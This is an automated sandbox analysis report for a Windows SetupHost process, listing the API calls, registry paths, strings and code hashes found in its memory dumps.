                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentErrorLastThread
                                                                                                                                                                                                                • String ID: %s, LOG: [0x%X] [%s] [%s]$CSetupDiagnostics::LogString$ERROR$INFO$WARNING$base\ntsetup\conx\mosetup\setuphost\DiagnosticsImpl.h
                                                                                                                                                                                                                • API String ID: 1800743499-698197140
                                                                                                                                                                                                                • Opcode ID: 5b2ebacdb26e67ec78335249226c8db49fae49af6e191c2dcfd34c1894c1a47d
                                                                                                                                                                                                                • Instruction ID: ace8841bc3bf4eb81016e3b3856ca92412f6bd71980cb60cf6c1151edce5bb6f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b2ebacdb26e67ec78335249226c8db49fae49af6e191c2dcfd34c1894c1a47d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1021E332A04311ABC711AE689949A6BBBA9AFC7724F01C62CF5584B391E771CE0487D1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CSystemHelper::ThreadExecute, xrefs: 009A6A0C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorEventLast
                                                                                                                                                                                                                • String ID: CSystemHelper::ThreadExecute
                                                                                                                                                                                                                • API String ID: 3848097054-703347033
                                                                                                                                                                                                                • Opcode ID: 1d2860138082fda2573725fe09b19c7e2401c5d3f397853bff13725b230b4a2c
                                                                                                                                                                                                                • Instruction ID: e38b5cce7cc5ae3930abf3f87c000a362141663c103d474fb059670139f5cf0b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d2860138082fda2573725fe09b19c7e2401c5d3f397853bff13725b230b4a2c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67219F31704305ABCB00AFB5DC899AEB7BDAFC5720B188529FA19C7291DB74DC158BD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A004D0
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00A004FB
                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00A00520
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A00531
                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(PANTHER_ENABLE_TELASSERT,?,00000104,?,02000000,65000000), ref: 00A0054C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseEnvironmentOpenQueryValueVariablememset
                                                                                                                                                                                                                • String ID: PANTHER_ENABLE_TELASSERT$SYSTEM\Setup\Panther$TelemetryAssertList
                                                                                                                                                                                                                • API String ID: 3483029746-3368635653
                                                                                                                                                                                                                • Opcode ID: a94c46ab099f5ae1776909c94a6bcc87032b935b9634f4f2809280df0df6af84
                                                                                                                                                                                                                • Instruction ID: 672613d2cacf36939823fed2cecb2d6824cce16a17ed99f96a13a39f833723b5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a94c46ab099f5ae1776909c94a6bcc87032b935b9634f4f2809280df0df6af84
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B116071A4122CABDB30EB65DC4DFDFBBBCEB55750F0041A5B519A2181D7709A81CEA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ImpersonateLoggedOnUser.ADVAPI32(?,?,?,?,00000000,00000000,00000000), ref: 00A08A51
                                                                                                                                                                                                                • WinHttpSetCredentials.WINHTTP(?,00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A08AB8
                                                                                                                                                                                                                • RevertToSelf.ADVAPI32(?,?,?,?,?), ref: 00A08AD9
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00A08F42
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3), ref: 00A08F63
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00A08F79
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A08F83
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: CloseHandle.KERNEL32(00000000), ref: 00A08FFE
                                                                                                                                                                                                                  • Part of subcall function 00A08F32: WTSFreeMemory.WTSAPI32(?), ref: 00A0900D
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A08B1B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A08B3B
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00A08B42
                                                                                                                                                                                                                • RevertToSelf.ADVAPI32(00000000,00000000), ref: 00A08B81
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,00000000,00000000), ref: 00A08B90
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A08B97
                                                                                                                                                                                                                  • Part of subcall function 00A0A619: CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000001), ref: 00A0A66A
                                                                                                                                                                                                                  • Part of subcall function 00A0A619: WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00A0A67C
                                                                                                                                                                                                                  • Part of subcall function 00A09C98: RegGetValueW.KERNEL32(80000002,?,RefreshAfter,00000048,00000000,?,00000008), ref: 00A09D41
                                                                                                                                                                                                                  • Part of subcall function 00A09C98: RegGetValueW.ADVAPI32(80000002,?,RefreshInterval,00000018,00000000,0000000D,00000004), ref: 00A09D6B
                                                                                                                                                                                                                  • Part of subcall function 00A09C98: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00000001,00000001,00000000), ref: 00A09D96
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$CloseHandleMutexRevertSelfTimeUserValue$ActiveConsoleCreateCredentialsEnumerateExitFileFreeHttpImpersonateLoggedMemoryObjectProcessQueryReleaseSessionSessionsSingleSystemTokenWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 729768055-0
                                                                                                                                                                                                                • Opcode ID: c577d6e86d19c73b1fa32c209a97515c437791c17624a4b5dafe7f3692bb927e
                                                                                                                                                                                                                • Instruction ID: 1aaf02c5e59baeb3d81fdc6b0732ab40fc79b51b30cdd5bc339cfa405d547cf9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c577d6e86d19c73b1fa32c209a97515c437791c17624a4b5dafe7f3692bb927e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 675109726083595BC721EF64A88496F7BE5AF84350F09092DF8C5D72C1CF38CD4587AA
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009A2639: strchr.MSVCRT ref: 009A2658
                                                                                                                                                                                                                • strrchr.MSVCRT ref: 009A22AC
                                                                                                                                                                                                                • _set_errno.MSVCRT ref: 009A22C3
                                                                                                                                                                                                                • strtol.MSVCRT ref: 009A22D0
                                                                                                                                                                                                                • _errno.MSVCRT ref: 009A22F1
                                                                                                                                                                                                                • strncpy_s.MSVCRT ref: 009A224A
                                                                                                                                                                                                                  • Part of subcall function 00A0ED1E: __EH_prolog3_catch.LIBCMT ref: 00A0ED25
                                                                                                                                                                                                                • strncpy_s.MSVCRT ref: 009A2376
                                                                                                                                                                                                                  • Part of subcall function 009A1EE1: UuidCreate.RPCRT4(?), ref: 009A1F0C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strncpy_s$CreateH_prolog3_catchUuid_errno_set_errnostrchrstrrchrstrtol
                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                • API String ID: 2476975350-2657877971
                                                                                                                                                                                                                • Opcode ID: 00c3c11300486fe4f867833e14704419e2b5f38e54b779bd6ce51ae8ef1cced4
                                                                                                                                                                                                                • Instruction ID: f15f92c07b73037373ec396427c4d80dbe9bf5671731f8b5dda3408a3ee9d683
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00c3c11300486fe4f867833e14704419e2b5f38e54b779bd6ce51ae8ef1cced4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B5157319083519FDB289BBD98547AEBBE9FF47310F14885DE896C7282DE389845C7B0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BC6D3: RegOpenKeyExW.KERNEL32 ref: 009BC6F0
                                                                                                                                                                                                                  • Part of subcall function 009BC6D3: RegCloseKey.ADVAPI32(00000000), ref: 009BC72B
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32 ref: 009BB5C6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 009BB5E7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?), ref: 009BB5EE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 009BB64E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009BB655
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 009BB664
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CloseProcess$AllocFreeOpenQueryValue
                                                                                                                                                                                                                • String ID: BuildLabEx
                                                                                                                                                                                                                • API String ID: 3475947390-1430032658
                                                                                                                                                                                                                • Opcode ID: 0147264e265cfc7cbd299d9888751ee5aab52c8456eaa854b446ad09de2911c8
                                                                                                                                                                                                                • Instruction ID: 21887132ac543a6ca77ceb306f6b4f1cf0f6d51fe0a8475b46592121e39b304a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0147264e265cfc7cbd299d9888751ee5aab52c8456eaa854b446ad09de2911c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C214671E04319EBDB11DFE58A88BEEB77DEB44334F108569E902961D1CBB48E05CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A08E77
                                                                                                                                                                                                                • WinHttpOpen.WINHTTP(OneSettingsQuery,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 00A08E9A
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A08EA6
                                                                                                                                                                                                                • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000), ref: 00A08EC3
                                                                                                                                                                                                                • WinHttpOpenRequest.WINHTTP(?,GET,?,00000000,00000000,00000000,00800000,?,?,00000001,00000000,00000000,00000000,?,?), ref: 00A08F0F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Http$Open$ConnectErrorLastRequestmemset
                                                                                                                                                                                                                • String ID: GET$OneSettingsQuery
                                                                                                                                                                                                                • API String ID: 1858633897-231841399
                                                                                                                                                                                                                • Opcode ID: 6e0133fb8ff47d15e5ce9bd8e1509fa3d2a624588260221f374a29860efd8d07
                                                                                                                                                                                                                • Instruction ID: 7db145ff3f35168f59efb4d5589f70d8e5b09356c52e3e2d2fc648f447c255d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e0133fb8ff47d15e5ce9bd8e1509fa3d2a624588260221f374a29860efd8d07
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2921B0B5600219ABDB209F75DD85FAB7BBDEF48700F008469BA45E3290EA74DD458B28
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00A0D24C
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00A0D277
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3_InfoNativeSystem
                                                                                                                                                                                                                • String ID: amd64$arm$arm64$ia64$x86
                                                                                                                                                                                                                • API String ID: 1414440993-1770253632
                                                                                                                                                                                                                • Opcode ID: 9b90a8b0045fdc407d7dbb5906480d244a242f87b8623d2cd39d452d081f94c2
                                                                                                                                                                                                                • Instruction ID: 49e7acf038418c2f0edf55f9ea997715a36345367785eaef7f7d7e2180773a62
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b90a8b0045fdc407d7dbb5906480d244a242f87b8623d2cd39d452d081f94c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A11BF33A1521D97CB29EAE8F6593ED76B1EF94320F144529A602AF2D4CA34CD40D745
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WTSGetActiveConsoleSessionId.KERNEL32 ref: 00A08F42
                                                                                                                                                                                                                • WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3), ref: 00A08F63
                                                                                                                                                                                                                • WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?), ref: 00A08F79
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3,00000001,00000000), ref: 00A08F83
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A08FB5
                                                                                                                                                                                                                • WTSQueryUserToken.WTSAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A08EE3), ref: 00A08FC8
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A08FFE
                                                                                                                                                                                                                • WTSFreeMemory.WTSAPI32(?), ref: 00A0900D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandleQueryTokenUser$ActiveConsoleEnumerateErrorFreeLastMemorySessionSessions
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3370614215-0
                                                                                                                                                                                                                • Opcode ID: 49bd12e57f7f6f9b4bb8ffa2b3a519549e3360a5a6b24ab9f0a04cbda1ad2bde
                                                                                                                                                                                                                • Instruction ID: 18e96462e1633364866610c7afd3cbb78f0d96b78e822439f9e77cd9f016960a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49bd12e57f7f6f9b4bb8ffa2b3a519549e3360a5a6b24ab9f0a04cbda1ad2bde
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8314F75D0022EEBCB11DFA8D944ADEBBB9FF08710F108155F851A3290DB749E41DB94
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009ACC1A
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 009ACDCC
                                                                                                                                                                                                                  • Part of subcall function 009B7D4B: UuidToStringW.RPCRT4(00000000,00000001), ref: 009B7D71
                                                                                                                                                                                                                  • Part of subcall function 009B7D4B: RpcStringFreeW.RPCRT4(00000000,?,00000000), ref: 009B7DD1
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeH_prolog3String$LibraryUuid
                                                                                                                                                                                                                • String ID: CSetupHost::LoadSetupObject$SetupHost: Loading ID: [%s] from [%s\%s]...$SetupHost: Loading complete.$W
                                                                                                                                                                                                                • API String ID: 4275956829-1340171671
                                                                                                                                                                                                                • Opcode ID: b396756614bc06578faf7bac4f52005302100e511210028eb4d60e6bf1f06fd9
                                                                                                                                                                                                                • Instruction ID: 3bb1a2f321a3b219beedb6f38965f170e8fa4885296068408bea99b2149657e1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b396756614bc06578faf7bac4f52005302100e511210028eb4d60e6bf1f06fd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 925165B4B002159BCF04EFA4CC59AAEB776AFC9720B158519E906AF391CB74D902CBD1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • RegGetValueW.KERNEL32(80000002,?,RefreshAfter,00000048,00000000,?,00000008), ref: 00A09D41
                                                                                                                                                                                                                • RegGetValueW.ADVAPI32(80000002,?,RefreshInterval,00000018,00000000,0000000D,00000004), ref: 00A09D6B
                                                                                                                                                                                                                  • Part of subcall function 00A09E64: RegOpenKeyExW.ADVAPI32 ref: 00A09EE2
                                                                                                                                                                                                                  • Part of subcall function 00A09E64: RegCloseKey.ADVAPI32(00000000), ref: 00A0A1CC
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00000001,00000001,00000000), ref: 00A09D96
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: TimeValue$CloseFileOpenSystem_vsnwprintf
                                                                                                                                                                                                                • String ID: %ls\%ls\%ls$RefreshAfter$RefreshInterval
                                                                                                                                                                                                                • API String ID: 2199227765-3481348938
                                                                                                                                                                                                                • Opcode ID: cbc3b076d86e7b9a559b8f8e46fdbecd4bc593b01e1a5bd12682cf331351fc45
                                                                                                                                                                                                                • Instruction ID: a964dd74bc8a78e382e105aa79dd7b626e290b42d27ef60f428dfef6945d5d0b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbc3b076d86e7b9a559b8f8e46fdbecd4bc593b01e1a5bd12682cf331351fc45
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA516371A8531C9FDB24DF64EC98BDAB7F9AB58700F0044A9E509D7281E770AE84CF54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,00000000), ref: 009BD18D
                                                                                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 009BD194
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000), ref: 009BD19E
                                                                                                                                                                                                                • RegCreateKeyExW.KERNEL32(80000002,SYSTEM\Setup\MoSetup,00000000,00000000,00000000,00020019,00000000,00000000,?), ref: 009BD1D5
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009BD210
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CloseCreateCurrentErrorLastWow64
                                                                                                                                                                                                                • String ID: SYSTEM\Setup\MoSetup
                                                                                                                                                                                                                • API String ID: 2503966421-2337335475
                                                                                                                                                                                                                • Opcode ID: 77af200f256c8fc2e9d4a9294c1d694665ba14b7bf3548f0c3a0306d59047bf2
                                                                                                                                                                                                                • Instruction ID: 8aed49d0668b1a214b7f718ab457cb7ced9be7e822ca538bd761263786367edd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77af200f256c8fc2e9d4a9294c1d694665ba14b7bf3548f0c3a0306d59047bf2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33215131E05219EBDF18DFA9DA49ADEBBB9AF84360F004469E905E3251E7349E01CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,SYSTEM\Setup\MoSetup\Volatile,?,?,SYSTEM\Setup\MoSetup\Volatile,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile), ref: 009BD25E
